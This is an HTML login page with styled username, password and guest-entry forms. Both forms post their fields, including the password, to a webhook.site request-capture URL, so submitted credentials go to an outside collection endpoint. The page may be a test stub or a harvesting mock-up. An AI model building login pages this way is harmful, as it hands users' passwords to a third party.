<html>
	<style>
		 /* Bordered form */
		form {
		  border: 10px solid #f1f1f1;
		}

		/* Full-width inputs */
		input[type=text], input[type=password] {
		  width: 100%;
		  padding: 12px 20px;
		  margin: 8px 0;
		  display: inline-block;
		  border: 1px solid #ccc;
		  box-sizing: border-box;
		}

		/* Set a style for all buttons */
		button {
		  background-color: #4CAF50;
		  color: white;
		  padding: 14px 20px;
		  margin: 8px 0;
		  border: none;
		  cursor: pointer;
		  width: 100%;
		}

		/* Add a hover effect for buttons */
		button:hover {
		  opacity: 0.8;
		}

		/* Extra style for the cancel button (red) */
		.cancelbtn {
		  width: auto;
		  padding: 10px 18px;
		  background-color: #f44336;
		}
		/* Guest button */
		.guestbtn {
		  width: auto;
		  padding: 10px 18px;
		  background-color: #cccccc;
		}
		.

		/* Add padding to containers */
		.container {
		  padding: 16px;
		}
	</style>
    <head>
        <title>Login page</title>
    </head>
    <body>
        <h1> Login Page</h1>
		<form action="https://webhook.site/ef0e800f-ec13-4673-b03a-21b6fbba8a8e" method="post">
		<button type="submit" class="guestbtn float-right"> Enter as Guest</button>
		</form> 

		<form action="https://webhook.site/ef0e800f-ec13-4673-b03a-21b6fbba8a8e" method="post">
		<div class="container">
		<label for="uname"><b>Username</b></label>
		<input type="text" placeholder="Enter Username" name="userid" required>

		<label for="psw"><b>Password</b></label>
		<input type="password" placeholder="Enter Password" name="pswrd" required>

		<button type="submit">Login</button>
		</div>

		<div class="container" style="background-color:#f1f1f1">
		<button type="reset" class="cancelbtn">Cancel</button>
		</div>
		</form> 


    </body>
</html>

